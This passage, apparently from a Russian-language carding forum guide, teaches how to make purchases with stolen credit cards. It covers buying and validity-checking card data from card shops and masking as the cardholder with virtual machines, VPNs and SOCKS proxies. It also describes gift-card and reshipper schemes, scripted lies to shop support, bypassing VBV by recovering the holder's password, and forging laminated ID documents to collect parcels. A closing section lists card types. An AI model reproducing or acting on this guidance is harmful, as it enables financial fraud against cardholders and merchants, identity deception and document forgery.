1.5. CCtools - генерирует ID системы, менят имя пользователя, ID процессора и прочеё. Необязательна для вещевухи, но лишней не будет в любом случае.
1.6. FireFox Eng - достаточно популярный браузер среди американцев.
1.7. ProxiFier+Socks Client+VPN, если работаем с скосами от vip72.
Проксифаер пропускает весь трафик через прокси, потому если сокс умирает, то трафик просто перестает поступать. Не дает засветить IP вашего VPN сервиса, в случае если сокс помрет.
Всё это необходимо для вашей безопасности и для того что бы система распознавала вас как рядового американца, которого мы и будем изображать на начальных этапах.
2. Поиски шопа.
2.1. Шопы ищутся различными способами.
Например, путем составления правильного запроса в гугле.
2.2. На начальном этапе шопы следует проверять на pr-cy.ru Page Rank не должен превышать 4 единиц. Характеристика относительная, но в начале будет полезна.
Ещё один способ - парсер и проверка на Alexa Rank. Сразу скажу, что вариант этот для усидчивых и для тех, у кого есть свободное время (на основной работе например), т.к. придется посещать кучу сайтов и из них уже выбирать подходящие.

1. Качаем программу http://bibyte.net/content/butterfly-40-beta-2, эта прога для примера, лучше найти другой парсер выдачи гугла, т.к. этот слишком мало сайтов ищет. В общем запускаем прогу, в окошке вводим свой ключ (online shop например, или gift card и т.п.), предварительно выбрав поисковую систему google по usa (там всё интуитивно понятно). Справа выбираем путь, куда будет сохраняться результат. В настройках не забываем поставить галочку "удалять дубликаты url".
2. Спарсили допустим 700 сайтов этой прогой, они сохранились в текстовом документе.
3. Качаем прогу http://netpeak.ua/soft после установки надо будет зарегать программу - ввести e-mail, на него придет ключ активации.
4. Запускаем Netpeak, в левом меню снимаем все галочки, оставляем только "Alexa"
5. Нажимаем верхнюю левую кнопку ("добавить" кажется, или "загрузить") и вставляем туда результат выдачи, которую спарсили прогой в первом-втором пункте. (там будут просто ссылки).
6. Снизу нажимаем то-ли "анализировать", то-ли "проверить". Там в общем тоже всё понятно.
7. После анализа в основном окне нажимаем на табличку "Alexa Rank", чтобы прога отсортировала нам сайты по показателю Alexa. Ну и заходим на все сайты подряд (2 раза тыкнуть по ссылке из окна программы).
Для тех, кто не знает, что такое Alexa. Это некий рейтинг - показатель посещаемости сайта. Чем он ниже (чем меньше цирфа) - тем круче и тем бОльшую сайт имеёт посещаемость. Соответственно заходим на сайты с самым большим рейтингом Alexa и по убыванию.
Оговорюсь, что Alexa рейтинг присваевается именно для сайтов одной и той-же тематики. Например, сайт интернет магазина с рейтингом 1кк будет иметь меньшую посещаемость, чем сайт интернет магазина с рейтингом 500к, но не факт, что он будет иметь меньшую посещаемость, чем сайт автомобильной тематики с рейтингом 500к.
В общем надо понять, что рейтинг присваивается именно сайтам одной, схожей тематики.
P.S. Даже при конкретном ключе (когда парсим), например "online shop", в выдаче будет куча совсем левых сайтов. Именно поэтому придется много сайтов посещать и делать отбор.
3. Подбор материала.
3.1 Вырабатывается с опытом. Поиск нужных бинов для каждого мерча. В большинство шопов лезут европейские карты. Но лучше уточнять.
Сочинить легенду, например вы хотите сделать подарок другу/жене/мужу или еще что-нибудь. И врите красиво!

4. Способы вбива.
4.1 Гифты. Самый удобный способ. Настраиваем систему под холдера карты, в шопе оформляем покупку на данные с СС. Сокс берем как можно ближе к холдеру.
Затем, если нам выслали гифт, оформляем на него покупку, указывая данные посредника.
4.2 Прямой вбив - имя указываем того, кто будет принимать товар. Билинг адрес берем с карты, шипинг - адрес посредника. Необходим прозвон, общение с саппортом. Сокс берем как можно ближе к холдеру.
4.3 Энролл. Самы сложный, но самый результативный метод. Необходим для жирных шопов. В настоящеё время найти незароленную карту довольно непросто, а процедура реэнрола достаточно сложна.

5.0 Работаем с EU картоном.
Схемы работы:
Вариант 1. Шоп дает нам выставить реальный BILLING ADDRESS держателя карты.
В таком случае мы выставляем BILLING ADDRESS с карты, в SHIPPING ADDRESS ставим адрес посредника. Имена ставим все с посредника. SOCKS 5 ставим под BILLING ADDRESS.
Советую начинать с прелюдий. Если есть live-chat(support) то пишем туда, если его нету - то на почту.
История простая: Вы нашли товар,которого нету у вас в стране и хотите купить его у них. При этом спрашивайте за интернациональную доставку(они откажут) и в том же сообщении спрашивайте возможность альтернативной доставки на посредника в США. Обязательно пишите уважительно, указывая заранеё свой ИМЯ, чтобы будущий заказ они сразу ассоциировали с вами. Работает на УРА со средней руки шопами.

Вариант 2. Шоп не дает нам выставить реальный BILLING ADDRESS держателя карты.
В таком случае мы выставляем BILLING ADDRESS с посредника, и SHIPPING ADDRESS соответственно так же с посредника. SOCSK 5 под BILLING ADDRESS (посредник).
Советую начинать с прелюдий. Если есть live-chat (support) то пишем туда, если его нету - то на почту.
История простая: Вы сейчас находитесь в командировке в Штатах и хотели бы сделать заказ. Сами вы из ***** и карта выпущена там же. Уже очень много магазинов отказало, а я ищу подарок своему партнеру (другу, брату, подруге, девушке). Работает на УРА со средней руки шопами.

Материал у которого сверяется BILLING ADDRESS: MX/BR/USA/Canada/NZ/AU/UK/HK/

6.0 Рассмотрим вбив в шоп, на примере последнего заказа - лодочного радара.
Жмем правой кнопкой на "эталонную" систему, выбираем копировать. Ставим галку напротив "генерировать новые мак адреса", выбираем "связную копию". Запускаем скопированную систему, с которой и будем работать.
После загрузки Win запускаем CCTools, генерируем и сохраняем нужные ID, запускаем впн, подбираем нужный сокс. Чекаем сокс на блек лист у брофмана или масимы. Если прокси скор равен нулю - выбираем карту в магазине. Желательно что бы ZIP код на карте и ZIP сокса совпадали или были как можно ближе.
Узнать ZIP сокса можно на сайте whoer.net
Тут же проверяем систему на соответстиве выбранному часовому поясу. Делаем корректировки системы (таймзона, время), обновляем страницу и добиваемся полного совпадения.
Ищем магазин, используя правильные поисковые запросы и спец.символы.
Заходим в гугл, пишем "buy+shop+marine radar+intext:"we accept credit cards"+site:.com"
Данный поисковый запрос выдаст нам сайты в com зоне, которые предлагает купить лодочный радар и поддерживает нужные нам методы оплаты - кредитные карты.
Выбираем нужный нам сайт, смотрим наличие нужного товара, проверяем pr.
Если нас все устраивает - ищем способ связаться с саппортом. Идеальный вариант - онлайн чат.
Выбираем нужный способ вбива. Я выбрал юса картон.
Пишем в саппорт что-то типа "Hello there. I have some questions about marine radar." И ждем ответа от саппорта. Они спросят что именно вам непонятно.
Можно задать пару вопросов по поводу товара, а затем перейти к тому что нас интересует - отсылают ли они на отличный от биллинга адрес и едят ли еврокартон(если вы решили бить именно им).
Поскольку я выбрал юса картон - меня интересует отсылка товара на отличный от биллинга адрес.
После общения и утвердительного ответа на вопрос "can you ship radar to my warehouse facility?" или куда там вам нужно слать, согласно вашей легенде, благодарим саппорт и идем в раздел чекаута.
Выбираем нужный способ доставки, заполняем биллинг адрес с карты, вписывая ФИО ПОСРЕДНИКА.
Заполняем шиппинг адрес - куда будем слать товар. ФИО ставим так же ПОСРЕДНИКА.
Жмём пэй или плейс ордер и если баланса на карте достаточно - получаем номер ордера.
Затем ждем 2-3 часа и связываемся с саппортом по поводу того, когда наш товар будет отправлен.
Можно прозвонить, можно через онлайн чат. Нам говорят дату и мы ждем трек.

7.0 Макеты общения с саппортом.
1. Предположим, у нас история такая. Мы - владельцы яхты, на которую нужно отправить тот же радар. Соответственно, отпралять его нужно не нам домой, а туда где стоит яхта.
Пишем на e-mail или в online chat. Можно так же прозвонить самим, если разговорный английский на уровне, но луче не рисковать и заказать прозвон у специалистов.
"Hello. I need marine radar for my boat. But it should be shipped to my warehouse facility, not to my house. Can you shipped it there?". Перевод следующий: "Здравствуйте, Мне нужен лодочный радар для моей лодки. Но отправить его нужно на склад, а не мне домой. Можете ли вы выслать его туда?"
Напрягаем фантазию, включаем мозги и сочиняем любые истории, которые нам нравятся. Если с английским сложности - всегда есть гугл транслейты, но в этом случае нужно писать простыми предложениями ибо он их переводит криво.
2. Мы - хотим сделать подарок сестре. Пусть у неё будет день рождения. Способы общения - те же. "Hi. I'd like to make a present for my sister. She's 30 next week. I'd like to send a gift. What's about dress? Can you shipped it to my sister?". Перевод следующий. "Привет. Я хотел бы сделать подарок своей сестре. Ей будет 30 на следующей неделе. Как насчет платья? Можете отправить его моей сестре?" И так Далее.
Не зацикливайтесь на одном макете. Постоянно дополняйте деталями - выглядит болеё правдоподобно.


Безопасность в работе

Основой нашей работы - является безопасность.

Начнем с покупки Double VPN соединения.
Double VPN – это связка VPN серверов, при которой подключение происходит в одной стране, после чего трафик по зашифрованному каналу передается на другой сервер и оттуда выходит в мир.- Защита от любого рода слежения и перехвата информации.
- Защита от хакерских атак в локальной сети.
- Firewall, препятствующий сканированию вашего IP адреса из сети интернет злоумышленниками.
- Доступ в интернет без ограничений, которые существуют на локальном или государственном уровне.
- Посещение сайтов (онлайн гемблинг и т.д.) если доступ с вашей страны запрещен.
- Защита от сканирования и перехвата трафика в WI-FI сетях.
- Полный доступ ко всем VOIP операторам, в том числе Skype.
- Анонимное скачивание BitTorrent и т.д.
- Полностью анонимный доступ в интернет

Нажимаем на ccылку сверху, проходим регистрацию. Переxодим в меню Добавить подписку и покупаем.
Настройку проходим как по ссылке https://vpn-service.us/settings/ Ставим на Виртуальную машину.
После настройки - обязательно проверить свой IP на сервисе http://whoer.net.Если увидели США - вы всё верно сделали.

Настройка DNS.
Что бы сайты не палили ваши родные ДНС, которые благодаря OS Windows не всегда проходят через ДНС сервер ВПН подключения, и могут быть переданы третей стороне, даже не смотря на ВПН, настраиваем их скрытие следующим образом:
Центр управления сетями и общим доступом >--> кликаем по своему сетевому подключению >--> затем в свойствах по протоколу IPv4
Вводим любые общедоступные ДНС из этого списка:
OpenDNS: 208.67.222.222 208.67.220.220
Level31 209.244.0.3 209.244.0.4
Google 8.8.8.8 8.8.4.4
Securly3 184.169.143.224 184.169.161.155
Comodo 8.26.56.26 8.20.247.20
OpenDNS 208.67.222.222 208.67.220.220
DNS Advantage 156.154.70.1 156.154.71.1
Norton DNS 198.153.192.1 198.153.194.1
ScrubIT4 67.138.54.120 207.225.209.77
OpenNIC5 74.207.247.4 64.0.55.201
Public-Root6 199.5.157.131 208.71.35.137
SmartViper 208.76.50.50 208.76.51.51
Жмём ОК - готово!
Теперь идем на whoer.net и проверяем, если все сделали правильно.
Не страшно, что ДНС Юсы, а ваш IP другой страны - эту проблему решат SOCKS5.

Теперь защищаемся от засвета своего реального IP при передаче пакетов в сеть, при вероятном падении ВПН.
Для этого есть масса способов, сейчас разберем основные:
1. С помощью firewall, путем запрета всех исходящих соединений, за исключением хостов ВПН серверов. Это для железной гарантии, что бы до подключения ВПН вообще никакие пакеты не ушли в сеть вашего своего IP.
2. Для тех, кто не любит заниматься секасом с файерволами, можно поступить намного проще. Есть такая замечательная утилита от isorg.org openVPN protector - ссылка для скачивания.
При падении сервака мгновенно вылетает уведомление с вопросом "продолжить работу в интернете?", даже если пользователь отсутствует и никак не отреагировал, сетевое подключение становится неактивным во всех направлениях.
3. Если постоянно работаем с личным ВПН - настраиваем маршрутизацию. Как это сделать, я описывал здесь. Не мало важный аспект в повседневной работе - шифрование данных!
Полагаю, для всех очевидно, что хранить на своем ПК в общедоступном виде деликатную информацию (данные для доступа, материал и прочеё) будет мягко говоря не умно.
Для этого покупаем шуструю флешку и создаем на ней зашифрованный раздел, например с помощью truecrypt'a - ссылка на скачивание дистрибутива.
Существует великое множество актуальных алгоритмов шифрования, но мы сейчас не станем их здесь подробно разбирать. Все описание и так уже давно есть в гугле.
Для нас сейчас важна сама основа, а она заключается не в типе шифровальщика, основной источник информации — это ваш мозг! Поэтому, в первую очередь контролируйте его а не свой ПК. А если головы нет - никакой криптографический софт вам этого не компенсирует, вы сами выдадите конфиденциальную информацию врагу и никакие вышеперечисленные меры не помогут!
Для тех, кто отстал от жизни. PGP, truecrypt и ост. - уже давно не панацея!
НО компьютер должен быть включен, а зашифрованные тома – подключены. Если вы успели выключить ПК, для гарантии минут за 15 до получения доступа нежеланными гостями и разделы были размонтированы - основания опасаться нет. + интересный материал по теме к размышлению youtube.com/watch?v=JDaicPIgn9U
Однако, помните всегда, какой бы длины не был ваш пароль от скрытого контейнера, сколько бы у вас не было задействовано скрытых подразделов в постановке ложной цели, никто еще не отменил терморектальный-криптоанализ (;

Вернемся к нашей флешке. Порекомендую завести сразу пару, например 16 гб для повседневной работы (тексты, сканы и прочеё) и вторую 32-64гб для создания резервных копий. Если собираетесь хранить образ VMware на флешке, тогда и основную лучше брать не меньше 32гб.
Распишу простейший вариант создания рабочей флешки для начала работы. С опытом уже сами определите, как работать в каждом, конкретном случае.
Установили трукрипт >--> подключили чистую флешку >--> запустили >--> создаем том >--> зашифровать несистемный раздел/диск >--> обычный том трукрипт >--> выбираем свою флешку через вкладку "устройство"
- режим создания тома выбираем по ситуации, если новая чистая флешка "создать и отформатировать том"
- если раздел носителя уже используется и там хранится важная информация выбираем второй вариант "зашифровать раздел на месте" >--> оставляем предлагаемые настройки шифрования >--> утверждаем размер тома >--> придумываем сложный пароль (не короче 20 символов! с переменным регистром и цифрами) например набираем латиницей на кириллице Проспект Мира 171 Кафе Чайка и получаем GhjcgtrnVbhf171RfatXfqrf. **при наличии в системе пунто свитчера с таким паролем нужно будет добавить трукрипт в исключения. >--> большие файлы - да >--> поводив курсором нажимаем "разместить" и идем заниматься своими делами, в зависимости от размера флешки и её тех. параметров. 32гб может готовиться 40-60 минут легко. Готово!
Теперь вставляя флешку каждый раз система будет спрашивать вас о её форматировании, важно не забыть и всегда нажимать - нет. Для работы со скрытыми разделами запускаем трукрипт и нажимаем кнопку "смонтировать", вводим пароль и подключается новый диск. По завершению работы закрыть всё, что запущено с флешки и нажать "размонтировать все", затем можно извлекать.

SOCKS5
При вбиве нужно всегда поверх одевать носки! Здесь вопрос не только в маскировке под холдера, но и в скрытии самого VPN, в дата центр которого, теоретически могут заявиться для изъятия данных.
Есть масса источников носков, приватных, кристально-молочно-чистых и так Далее. Всё это наработается с опытом, а вначале вам ни к чему заморачиваться с доступом к приватным носкам и засылать только туда сразу баксов 200.
Для начала можно воспользоваться сервисом vip72.com. У них есть свой собственный сокс-клиент для работы с носками, в нем можно осуществить выборку по критериям: страна, штат, населенный пункт, диапазон или просто запросить с сервера случайную подборку. Также есть чекер на наличие сокса в блеке и подробное описание по каждому серверу (скорость не маловажный фактор).
Регистрируемся >--> пополняем баланс >--> берем подписку >--> скачиваем софт из кабинета >-->устанавливаем и запускаем. Сразу с ним установится и необходимый нам проксификатор (портабл).
Запускаем proxifier >--> в треё появляется иконка одновременно являющаяся индикатором трафика >--> кликем по иконке в треё и попадаем в проксификатор >--> вкладка profile >--> proxy servers >--> add >--> добавляем взятый из сокс клиента сокс5-сервер 127.0.0.1 и порт 9951, указывеам версию протокола в настройках (5) - готово!

Теперь настраиваем проксификатор для скрытия DNS (да, их и здесь придётся маскировать):
вкладка profile >--> name resolution >--> убираем галку с "detect DNS..." и ставим возле "resolve hostnames through proxy" >--> ок
*** если у вас уже была установлена старая версия проксификатора, там эти настройки имели немного иной вид: вместо "choose the mode automatically" выбрать "remotely". Done!


Mетоды вбива в шоп

Говорю сразу, что придерживаюсь работы на качество.

1. E-gift карты
Советую делать номиналы 500 - 1000 за 1 гифт.
Вбивайте в рабочеё время по США
Материал USA типы пожирнеё (gold,platinum,infinite,premium и.т.д)
Billing и Shipping пишем с карты
Телефон указывайте любой(но не с карты) - как вариант найти отель в вашем штате и указать FAX
Прозвон в шоп делаем через 2-3 часа после размещения ордера.
/ Простым языком - E-gift это подарочные сертификаты, которые имеют номинал. При покупке мы
указываем Email для доставки сертификата. Если все проxодит удачно - на наш еmail приxодит
сертификат.
После этого мы сразу на6ираем товар на сумму сертификата и высылаем его на себя.

2. Прямой вбив
Вбивайте в рабочеё время по США
Материал берем Европу или Азию типы пожирнеё (gold, platinum, infinite, premium и.т.д)
Socks под СС.
Billing - данные с карты. Shipping - адрес посредника. ФИО пишем и Туда и Сюда с Посредника.
Телефон указывайте факс или свой skype.
Прозвон в шоп делаем через 2-3 часа после размещения ордера. При необходимости предоставляем отрисовки СС и Паспорта xолдера.
/ Простым языком - Вы житель Европы/Азии, который желает купить товар в США и привезти его на родину. Но так как шоп не шлёт интернационалом, вы покупаете на Посредника.

3. Enroll
Делаем Enroll по мануалу.
Меняем Billing адрес на адрес посредника. После смены адреса - можете вбивать в любой шоп, указав Billing и Shipping с посредника.


Пример вбива в шоп

Разбираем вбив в шоп, на примере : http://www.territoryahead.com
ˆ Любой вбив начинается с выбора предмета покупки. Выбираем товар -> Добавляем в корзину
ˆ После переxода в корзину - мы видим кол-во кинутого туда товара, общую сумму за всю корзину
ˆ После нажатия на Checkout - мы всегда видим обязательную для заполнения Billing and Shipping информацию, информацию о платежном средстве(карте). Информацию вводим исходя из выбранного метода вбива см. [Пункт 5]
ˆ Если в6ив удачный - после нажатия Checkout - вы получите о6 этоm соо6щение


Как выглядит СС шоп
Каждый день Вам придется работать с шопами СС (credit card), по этому вы должны знать и понимать их структуру.
За пример возьмем любой шоп.
После проxождения регистрации вам открывается окно.
После того как вы нашли нужную вам карту - вы покупаете её.
Каждую карту можно проверить на Валид (работоспособность) - через Checker. Для этого переxодим в меню ORDER & CHECK и напротив каждой карты видим Check.
После нажатия, карта 6удет прочекана. Если выдает DEAD - то карта мертва и вам возвращают средства. Чек доступен в течении получаса после покупки карты. Если ALIVE - то карта жива.

Как пополнить шоп:
Для этого надо перейти в меню ADD FUNDS и пополнить шоп через BITCOIN или через чек PAYMER - что удо6неё.
Для этого вам надо купить PAYMER чек.


Настройка системы

ˆ Обязательная установка Виртуальной машины http://ru.wikipedia.org/wiki/VirtualBox
ˆ На неё ставим любой ENG Windows (xp/win7). Например http://www.torrentino.com/torrents/1802511
ˆ Установить СС Cleaner http://ccleaner.org.ua/download/
ˆ Браузер IRON

Для чего это надо?
Работать надо грамотно и подстраиваться под гражданина США правдиво. Для этого ставится виртуальная машина, на неё Английский Windows,на неё Английский браузер, настраивается время под ШТАТ держателя карты, с которого делаем оплату.
CCleaner - нужен для для того что6ы чистить систему после каждого вбива


Шопы с VBV + и -

Если вы видите этот значок в шопе, то мерч поддерживает VBV и MCSC. Перенаправят на сайт банка и попросит ввести секретный пароль для продолжения оплаты.

+ Если вы ввели платежный пароль, то ответственность несет Банк холдера. Т.е платеж в шоп не получит чардж.
+ Легко высылают товар на разный 6илл/шипп адрес
+ Проxодят легко авиа/отели и они не подвержены чарджу

- Высокая стоимость
- Сложно найти материал
- Контакты Селлеров

Как о6ойти MCSC и VBV
1. Бить BIN без VBV
2. Восстанавливать пароль VBV c помощью доп. данных - MSN/DOB/Email xолдера.Зависит от USA банка

Бины без VBV можно найти на форуме.


Документы для приема посылки в РУ

Для начала скачиваем файлы прикрепленный к посту (печать и форму).
1) Заполняете форму используя любой графический редактор и добавляем печать в удобное место. Не обязательно чтобы печать залезала на фото.
2) Распечатайте форму в формате А6 (в примере форма формата А6 распечатана на листе А4).
2) Распечатываем фотографии подходящие под формат окошка "Место для фото"
3) Вырезаем лезвием одно фото и клеим его на место под фотографию и расписываемся за владельца документа и за того кто его выдал! Так же не забываем обрезать саму форму под формат A6.
4) Берем ламинатор и плёнку для ламинирования
5) Кладем нашу заготовку в пленку для ламинирования и засовываем в разогретый ламинатор (советую использовать пленку поплотней, тогда документ будет выглядеть максимально реалистично и фундаментально).
И вуаля, мы получили готовый документ! Встречал много посылок, проблем никогда не было.
По факту можете делать любой документ, какой хотите. Хоть удостоверение дворника. Если вы его заламинируете, то курьер отдас посылку. Удачи!
* Стоимость ламинатора меньше 2 000 рублей.
* Весь процесс занимает 5-10 минут.


Типы и виды СС для работы (для новичков)

Доброго времени суток! У всех новичков возникают различные вопросы по поводу: "А какую карту мне лучше приобрести для вбива - Platinum, Premier либо Prepaid и т.д.?", отсюда и появилась актуальность в создании данной темы.

В основном для первоначальных вбивов мы используем 3 вида карт: American Express (карта начинается с цифры 3), Visa (с 4), Master card (с 5). Каждая из этих карт имеёт свой определенный тип.

В основном будем выбирать Кредитные карты или Дебетовы карты, в чем х отличие:
- Кредитные карты обеспечивают финансовую свободу, без которой сегодня не обойтись. Это удобный инструмент для оплаты покупок и услуг, дающий дополнительную финансовую независимость при принятии решений, а также доступ к различным преимуществам и сервисам. То есть Банк выдает Вам лимит на получение кредитной суммы, которой вы сможете расплатиться за ту или иную услугу, что для на очень необходимо!
- Дебетовые карты — это удобный инструмент доступа к банковскому счету, на котором хранятся Ваши денежные средства. С помощью дебетовой карты Вы можете оплачивать товары и услуги, а также снимать наличные в банкоматах по всему миру. То есть мы тратим свои же деньги, находящиеся на нашем банковском счете, на приобретение той или иной услуги.
Как видим, кредитные карты для нас болеё благоприятны!

И так начнем с типов карт American Exspress (основа, с чем придется работать):
Репутация американского гиганта финансовых операций сегодня безупречна и тщательно поддерживается на высочайшем уровне. American Express делает упор на качество услуг и сервиса и выстраивает свои отношения с клиентами, опираясь на многолетний опыт и традиции. Компания предлагает персональные и корпоративные кредитные карты. Держатели корпоративных карт (Corporate Card) – сотрудники крупных мировых корпораций. Персональные карты выпускаются четырех видов: Personal Card (так называемая «Зеленая»), Gold Card, Platinum Card and Centurion Card.
Идёт по нарастанию приоритетов. Все они отличаются только классом, поскольку традиционные преимущества полагаются каждому клиенту AmEx.

Далее идут карты VISA:
Visa Electron — самый простой вид карт. Не имеёт выпуклых элементов, что ограничивает возможность использования этого вида карт в терминалах, основанных на снятии оттиска с карты (механическое копирование без подключения к базе данных). Как правило, установлены минимальные лимиты на операции и минимальные гарантии.
Visa Virtual card — карта для совершения платежей через интернет. Порой «выпускается» без физической выдачи карты. Фактически, это предоставление владельцу лишь реквизитов карты (номер, CVV2, дата действия и т.п.), которые можно использовать для оплаты через Интернет. Удешевляется эмиссия карты, но снижается защищённость. Обычно являются предоплаченными в момент эмиссии и не предусматривают возможность пополнения. Могут быть анонимными, что иногда вызывает трудности при обработке в платёжных системах с обязательной верификацией имени владельца.
Visa Classic — карта со стандартным набором функций. Сюда входят платежи в большинстве торговых точек, принимающих карты, бронирование различных товаров и услуг в Интернете, страхование находящихся на счету денег и т.д.
Visa Gold — карта, которая имеёт дополнительные гарантии платёжеспособности держателя, болеё высокие платёжные и кредитные лимиты по сравнению с Classic, а также ряд дополнительных сервисов, среди которых экспресс-выдача наличных и экстренная замена карты в случае утери или кражи карты вдали от банка-эмитента, дополнительные скидки и привилегии в таких сферах, как путешествия, прокат автомобилей, покупки эксклюзивных товаров и услуг. Как правило, вместе с обязательными привилегиями от платёжной системы, банки-эмитенты карт предлагают собственные дополнительные услуги для держателей карт Gold и болеё высокого уровня.
Visa Platinum — элитная карта, которая обычно предоставляет возможность владельцу получить дополнительные услуги, скидки, страховки в объёмах, превышающих привилегии для держателей карт Gold.
Visa Signature — карточный продукт для особо состоятельных клиентов, отличительными особенностями которого являются максимальная покупательная способность, повышенные лимиты на различные группы операций по картам, эксклюзивные услуги в области отдыха, покупок и путешествий, а также консьерж-сервис и специальные возможности на личной странице в Интернете.
Visa Infinite — позиционируется как наиболеё престижная карта для клиентов с наивысшей платёжеспособностью. В ряде случаев кредитный лимит по такой карте неограничен.
Visa Black Card — имиджевый элитарный продукт. Материалом для изготовления служит не обычный пластик, а патентованный специальный углепласт. Позиционируется как символ принадлежности держателя к верхушке общества. Из-за повышенных требований, в США владельцами этой карты могут стать не болеё 1 % жителей. Владелец сможет останавливаться в VIP-салонах международных аэропортов, пользоваться услугами консьерж-сервиса, обеспечивается туристическая страховка, покрытие ущерба при автомобильной аварии, возмещение затрат при отмене поездок.
Visa Business Credit и Visa Business Debit — карты для представителей юридических лиц, предназначенные для расчётов в интересах бизнеса. Данные карты позиционируются как продукт для малого бизнеса.
Visa Business Electron Card — карты позиционируются платёжной системой как продукт для малого бизнеса в странах с развивающейся экономикой.
Visa Corporate — карты бизнес-сегмента, предназначенные для компаний среднего и крупного бизнеса.
Visa Fleet — карты бизнес-сегмента, ориентированные на компании, использующие автотранспорт в своей основной деятельности. Этот тип карт помогает компаниям отслеживать эксплуатационные расходы своего автопарка, а также получать дополнительные скидки на топливо и сервисное обслуживание.
Visa Debit — карта для каждодневных расходов. Её особенность состоит в том, что списание средств происходит с депозитного счёта клиента, как если бы он снимал со счёта наличные или выписывал чеки в оплату приобретённых товаров или услуг.
Visa Prepaid Card — карта, баланс которой пополняется при выдаче в банке, и дальнейшие операции проводятся в пределах доступного остатка средств. Разновидностью данного типа карт является подарочная карта — Gift Card. Разновидностью данного типа карт можно считать и карты моментальной выдачи Visa Instant Issue — заранеё персонализованные, но не персонифицированные (без указания имени держателя). Особенностью этого типа карт является быстрая выдача карты, как правило в течение 15—20 минут с момента обращения клиента в банк.
Visa TravelMoney — карта, предназначеная в первую очередь для безопасной перевозки денежных средств, например в ходе путешествия, являясь болеё технологичным аналогом дорожных чеков. Как правило, по данному виду карт возможны только операции снятия наличных в банкоматах, однако отдельные банки допускают и покупки по картам TravelMoney.
Visa Mini Card — карта уменьшенного формата, нередко выпускается с отверстием, подразумевая использование и в качестве брелока и не только. Необходимо отметить, что соседство с металлическими ключами крайне нежелательно и может пагубно сказаться как на записанной на магнитной полосе информации, так и привести к повышенному механическому износу карты. В силу нестандартного формата, этот тип карт невозможно использовать в банкоматах, терминалах с контактными чипами (бесконтактный протокол поддерживается — если карта снабжена таким чипом), также не получится использовать карту в импринтерах. Таким образом, данный продукт пригоден лишь для оплаты покупок или получения наличных в точках, оборудованных электронным терминалом, способным работать по магнитной полосе или бесконтактному чипу. По этой причине данный тип карт, как правило, выпускают в «связке» с картой стандартного формата, имеющей доступ к тому же картсчёту.
Visa Buxx — целевой аудиторией этой карты являются подростки, не имеющие пока самостоятельного дохода. Родители имеют возможность зачислять на карту «безналичные карманные деньги» и контролировать движения по счёту.
Visa Horizon — дебетовая карта, которая хранит средства на самом чипе, предварительно преавторизовывая их со счёта в банке. При её использовании нет необходимости устанавливать связь в режиме реального времени с банком-эмитентом для получения авторизации. Вся информация о доступном балансе находится на самой карте в памяти встроенного чипа и доступна для чтения терминалом в торговой точке. Держатель карты при необходимости может пополнить баланс на карточке со своего счёта в банке либо через банкомат, либо через один из терминалов в торговой сети или отделениях банка. Visa Horizon идеально подходит в тех случаях, когда существуют проблемы со связью или таковая вообще отсутствует. Поскольку для данного продукта отсутствует риск неплатёжеспособности или перерасхода средств за счёт предварительной авторизации, то Visa Horizon идеально подходит для выдачи клиентам, у которых отсутствуют банковская и кредитная истории. В отличие от карты с электронным кошельком, в котором баланс на карте предоплачивается и
в случае потери карты клиент теряет непотраченные средства с карты, Visa Horizon позволяет восстановить остававшиеся к моменту потери карты средства на счету клиента в банке.
Visa Cash или, как ещё её принято называть, «электронный кошелёк», является предоплаченной картой и совмещает в себе удобства платёжных карт с защищённостью и функциональностью встроенного чипа. Карта Visa Cash позволяет легко и быстро оплачивать мелкие расходы, поэтому в основном может использоваться для покупки недорогих предметов, таких, как газеты, билеты в кино, для оплаты непродолжительных телефонных переговоров и т. д. Карта Visa Cash может быть либо пополняемой, либо одноразовой. Решение об этом принимается банком-эмитентом, выдающим карту, и согласовывается с клиентом.
Visa Payroll — обычный тип карт, который сразу при приобретении предоставляет страховку личного имущества человека, приобретённого при помощи данной карты Visa. Общая сумма страховки не может превышать 50 тысяч долларов на человека. На данный момент такие карты выпускаются только в США.
Visa Check, Visa Gold Check и Visa Business Check — карты, созданные для сотрудничества с программами накопления миль у авиаперевозчиков. В основном это касается системы WorldPerks компании NWA
Visa Platinum Check — аналогична предыдущим трём картам, однако не может быть объединена с программой WorldPerks, хотя предоставляет бо́льшие возможности для обладателей, чем Visa Check или Visa Gold Check.
Visa Purchasing — карта предлагается банками с 1994 года и предназначена для учёта затрат на офисные нужды. Карта может быть использована как средними, так и крупными компаниями и выдаётся, как правило, людям, отвечающим в этих компаниях за хозяйственную деятельность. Её использование позволяет компаниям как частного, так и государственного сектора обходиться без требующего много труда и бумаг процесса оформления небольших закупок товаров и услуг. Карта непосредственно предназначена для закупки товаров и оплаты услуг на сумму в пределах 5 тысяч долларов США. Для данных карт к банкам предъявляются требования по специальной форме отчётности при выставлении счетов. Благодаря этой форме предприятие может существенно сэкономить на административных расходах, связанных с приобретением товаров, а также получить информацию, анализ которой может быть взят за основу для проведения переговоров с поставщиками товаров и услуг относительно болеё выгодных условий сотрудничества.
Visa Commercial — создаёт простую консолидацию расходных данных со всех отделов, подразделений и дочерних предприятий компании, что обеспечивает интегрированный обзор всех расходов по проведению мероприятий и закупкам, а также командировочных расходов.

Следует обратить внимание, что в некоторых странах или регионах доступны не все виды карт; это может быть связано с особенностями законодательства той или иной страны, а также региональными ограничениями самой платёжной системы.

Далее рассмотрим карты типа Master Card (основные):
MasterCard Maestro - это самые доступные банковские карты, вследствие своей низкой стоимости и первоначального взноса. Приобретая её, вы становитесь обладателем полноправной международной карты, широко применяемой в мире.
MasterCard Standard – наличие таких карточек подчеркивает, что Вы - состоявшийся человек, успешно ведущий дела. Отправляясь за границу и имея при себе одну из этих карт, у Вас не будет проблем забронировать номер в отеле или взять напрокат автомобиль.
MasterCard Gold – эти карты внушают большеё уважение к владельцу этой карты. Они однозначно говорят о том, что его авторитет и вес в обществе выше обычного, что человек достиг в своей жизни серьезных результатов. Это дает владельцу «золотых» карт право на скидки при заказе дорогих номеров в гостиницах и при совершении покупок в престижных магазинах.
MasterCard Platinum – особые банковские карты класса «Премиум». Дают безграничные возможности, полную свободу и эксклюзивность. Владельцу платиновой карты обеспечен статус VIP-персоны в любом месте, в любой точке во всем мире. Это гарантирует одновременно высококлассное обслуживание и существенные скидки.

Вот вроде и расписаны основные виды и типы кредитных и дебетовых карт, с которыми нам придется в дальнейшем работать! Информация по данным картам была взята из сети Интернет + некоторые свои дополнения. Тема написана поверхностно, без описания конкретных подробностей, дабы не грузить этим голову "Новичкам".
Думаю для новичков, данная тема будет полезна!
Всем спасибо за внимание! Если тема пригодилась, говорим спасибо!


